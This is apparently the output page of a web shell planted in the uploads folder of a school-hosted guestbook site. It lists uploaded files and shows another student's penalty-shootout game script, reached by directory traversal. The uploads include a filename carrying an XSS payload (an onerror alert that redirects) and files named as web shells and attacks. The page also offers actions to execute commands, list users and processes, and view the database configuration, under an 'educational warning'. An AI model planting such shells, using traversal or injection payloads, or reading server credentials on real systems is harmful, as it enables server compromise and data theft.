🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586246.klas4s23.mid-ica.nl/public_html/penaltyshoutout/index.js

document.addEventListener("DOMContentLoaded", function () {
    let canvas = document.getElementById("canvas");
    let context = canvas.getContext("2d");

    var window_height = window.innerHeight;
    var window_width = window.innerWidth;

    canvas.width = window_width;
    canvas.height = window_height;

    const soccerImage = new Image();
    soccerImage.src = "soccer.png";

    const boardImage = new Image();
    boardImage.src = "board.png";

    const startButton = document.createElement("button");

    const testerImage = new Image();
    testerImage.src = "StartUI.png";
    testerImage.classList.add("Tester");

    const startText = document.createElement("span");
    startText.classList.add("StartText");
    startText.textContent = "START";

    const textTitel = document.createElement("h1");
    textTitel.classList.add("TextTitel");
    textTitel.textContent = "Penalty Shootout";

    startButton.appendChild(testerImage);
    startButton.appendChild(startText);

    document.body.appendChild(textTitel);
    document.body.appendChild(startButton);

    const setStyle = (element, styles) => Object.assign(element.style, styles);

    setStyle(startButton, {
        position: "absolute",
        top: "10px",
        left: "10px",
        background: "none",
        border: "none",
        cursor: "pointer",
        transition: "transform 0.2s ease-in-out",
        transform: "scale(0.4)"
    });

    setStyle(startText, {
        display: "flex",
        alignContent: "center",
        flexDirection: "column",
        justifyContent: "center",
        marginTop: "-17%",
        fontSize: "45px",
        fontWeight: "bold",
        marginLeft: "128%"
    });

    setStyle(testerImage, {
        marginLeft: "80%",
        marginTop: "26%"
    });

    setStyle(textTitel, {
        fontSize: "80px",
        marginTop: "-16%",
        marginLeft: "114%",
        display: "flex",
        flexDirection: "row",
        justifyContent: "flex-start"
    });

    soccerImage.onload = function () {
        context.drawImage(soccerImage, 0, 0, window_width, window_height);

        boardImage.onload = function () {
            context.drawImage(boardImage, 500, 0, 500, 600);
        };
    };

    startButton.addEventListener("click", function () {
        console.log("Start Button Clicked!");


        startButton.style.transform = "scale(0.5)";


        soccerImage.style.display = "none";
        boardImage.style.display = "none";

        setTimeout(function () {
            startButton.style.transform = "scale(0.4)";
        }, 200);


        setTimeout(function () {
            document.body.style.transition = "opacity 0.5s";
            document.body.style.opacity = 0;

            setTimeout(function () {
                window.location.href = "index2.html";
            }, 500);
        }, 400);
    });
});

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!